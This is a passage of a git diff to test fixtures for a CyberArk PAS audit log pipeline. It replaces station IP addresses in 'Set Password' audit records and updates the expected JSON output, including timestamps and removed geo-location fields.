b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log index 308e66ee8c0..0c85cdc8b95 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log @@ -3,16 +3,16 @@ Mar 08 02:54:46 VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PVWAGWUser","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} <5>1 2021-03-10T08:29:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:19","IsoTimestamp":"2021-03-10T08:29:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} <5>1 2021-03-10T08:29:28Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:28","IsoTimestamp":"2021-03-10T08:29:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PasswordManager","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 34.66.114.180\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.66.114.180","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json index 804117f7541..9d7c7ab2acd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212139100Z", + "ingested": "2021-12-09T13:37:13.320124300Z", "original": "\u003c5\u003e1 2021-03-04T19:16:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:16:19\",\"IsoTimestamp\":\"2021-03-04T19:16:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" @@ -100,7 +100,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212147900Z", + "ingested": "2021-12-09T13:37:13.320131800Z", "original": "\u003c5\u003e1 2021-03-04T19:16:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:16:19\",\"IsoTimestamp\":\"2021-03-04T19:16:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" @@ -143,7 +143,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212149500Z", + "ingested": "2021-12-09T13:37:13.320135400Z", "original": "Mar 08 02:54:46 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" @@ -199,7 +199,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212150900Z", + "ingested": "2021-12-09T13:37:13.320140200Z", "original": "\u003c5\u003e1 2021-03-10T08:29:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:29:19\",\"IsoTimestamp\":\"2021-03-10T08:29:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" @@ -252,7 +252,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212152100Z", + "ingested": "2021-12-09T13:37:13.320145400Z", "original": "\u003c5\u003e1 2021-03-10T08:29:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:29:28\",\"IsoTimestamp\":\"2021-03-10T08:29:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" @@ -265,20 +265,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -295,7 +283,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -303,7 +291,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:52Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Set Password", "message": "Set Password", "issuer": "PSMPApp_localhost.localdomain", @@ -317,8 +305,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212153400Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320150400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -330,20 +318,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ 